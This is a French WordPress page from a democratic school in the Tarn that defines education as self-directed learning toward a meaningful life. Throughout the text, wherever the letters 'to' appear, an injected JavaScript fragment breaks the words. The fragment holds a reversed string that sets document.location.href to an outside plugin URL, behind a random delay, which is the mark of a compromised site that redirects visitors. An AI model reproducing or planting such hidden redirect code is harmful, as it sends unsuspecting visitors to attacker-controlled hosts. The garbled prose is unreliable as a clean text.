ÉDUCATION

Dans le langage courant, l’usage du mot « éducation » amène à penser que l’éducation est quelque chose que les enseignants ou les parents donnent aux enfants. Or, c’est bien l’enfant qui apprend, qui « incorpore (ou non) la matière » qui lui parvient.

Il nous paraît plus intéressant de prendre pour base de réflexion une autre définition de l’éducation. Ainsi, nous appellerons éducation la somme des choses (savoirs, savoirs-faire, savoirs-être..) qu’une personne apprend pour vivre une vie satisfaisante et qui a du sens pour elle.

Cela inclut ces choses dont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute personne sur terre a plus ou moins besoin : marcher, parler sa langue maternelle, interagir avec les autres, réguler ses émotions, faire des plans et les réaliser, réfléchir et prendre des décisions. Cela inclut aussi des compétences culturelles spécifiques. Dans notre culture, par exemple, cela inclut le fait de savoir lire, calculer avec des nombres, utiliser un ordinateur, conduire une voiture… ces choses que la plupart des gens voient comme indispensables pour vivre la vie qu’ils ont envie de mener, au sein de la culture dans laquelle ils grandissent.

Qu’en est-il du reste des compétences et connaissances qui existent ? Compléter son éducation impliquer de réussir à les maîtriser toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes ? Assurément, personne n’est en mesure de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout savoir. En réalité, même au sein d’une même culture, les connaissances et compétences diffèrent grandement selon les gens. Que choisir d’apprendre alors ? et qui est légitime pour faire ce choix ? Nous croyons qu’il appartient à chacun-e de définir ce que signifie « une vie satisfaisante et qui a du sens » et donc de décider des connaissances et compétences qui lui seront utiles…

En accord avec cette définition de l’éducation, l’École Démocratique du Tarn entend créer un cadre collectif, démocratique, sécurisant et conscientisant dans lequel les enfants pourront s’autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-éduquer. Nous pensons que s’approprier sa vie et son éducation est la meilleure manière d’entrer dans la vie d’adulte pleinement outillé·e pour contribuer à une société en pleine évolution.

Pour aller plus loin, nous nous proposons de réfléchir au sens que nous mettoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons derrière certains mots..

  • autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-éducation
  • justice

Fièrement propulsé par WordPress | Thème : Baskerville 2 par Anders Noren.

Retour en haut ↑